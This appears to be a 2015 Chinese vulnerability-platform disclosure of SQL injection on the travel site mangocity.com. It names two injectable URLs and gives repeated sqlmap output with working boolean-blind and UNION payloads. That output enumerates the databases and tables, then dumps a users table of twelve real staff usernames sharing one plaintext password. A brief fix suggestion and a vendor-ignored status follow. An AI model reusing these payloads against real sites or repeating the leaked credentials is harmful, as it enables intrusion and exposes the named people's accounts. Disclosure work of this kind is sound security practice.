2015-06-30: 细节已通知厂商并且等待厂商处理中 2015-07-05: 厂商已经主动忽略漏洞,细节向公众公开
RT
主站SQL注入密码明文存储注入点1:
http://www.mangocity.com/product/10506752p2.html?type=90&c=cholidayindexcontroller&m=comindex&d=grouptraveltype参数存在注入
注入点2:
http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=214412p2thirdpartid参数存在注入
sqlmap identified the following injection points with a total of 183 HTTP(s) requests:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel Type: UNION query Title: MySQL UNION query (90) - 9 columns Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel---web application technology: PHP 5.3.28back-end DBMS: MySQL >= 5.0.0current user: 'vacation@10.10.4.55'current database: 'vacation_init'current user is DBA: Falseavailable databases [3]:[*] information_schema[*] test[*] vacation_initsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel Type: UNION query Title: MySQL UNION query (90) - 9 columns Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel---web application technology: PHP 5.3.28back-end DBMS: MySQL 5Database: vacation_init[37 tables]+-----------------------------+| album || album_relationships || business_module || business_module_bak20150419 || business_type || common_config || keyword || media || pm_params || pm_tui || pm_tui_bak20150618 || product || product_accommodation || product_additional || product_album || product_arrival || product_departure || product_departure_month || product_detail || product_detail_item || product_extra || product_itinerary || product_journey || product_journey_album || product_journey_event || product_journey_event_album || product_lineinfo || product_scenery || product_tag || product_theme || product_type || temp_update_product || term_relationships || term_taxonomy || terms || user_role || users |+-----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel Type: UNION query Title: MySQL UNION query (90) - 9 columns Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel---back-end DBMS: MySQL 5Database: vacation_initTable: users[3 columns]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(10) || roleId | int(10) || username | varchar(20) |+----------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel Type: UNION query Title: MySQL UNION query (90) - 9 columns Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel---web application technology: PHP 5.3.28back-end DBMS: MySQL 5sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=90 AND 1118=1118&c=cholidayindexcontroller&m=comindex&d=grouptravel Type: UNION query Title: MySQL UNION query (90) - 9 columns Payload: type=-4130 UNION ALL SELECT 90,90,90,90,90,90,90,90,CONCAT(0x7176787171,0x4c736767644348706b7a,0x7178706271)#&c=cholidayindexcontroller&m=comindex&d=grouptravel---web application technology: PHP 5.3.28back-end DBMS: MySQL 5Database: vacation_initTable: users[12 entries]+-------------+-----------+--------+| username | password | roleId |+-------------+-----------+--------+| chenhuan | mango2015 | 0 || chenjie | mango2015 | 0 || cms | mango2015 | 0 || liuchunyan | mango2015 | 0 || panwei | mango2015 | 0 || pengwenhui | mango2015 | 0 || renxianglin | mango2015 | 0 || songwanbing | mango2015 | 0 || sunbaoyu | mango2015 | 0 || wuhongbo | mango2015 | 0 || xujia | mango2015 | 0 || zhanglan | mango2015 | 0 |+-------------+-----------+--------+
参数过滤密码储方式修改为加密存储
危害等级:无影响厂商忽略
忽略时间:2015-07-05 09:44
漏洞Rank:15 (WooYun评价)
暂无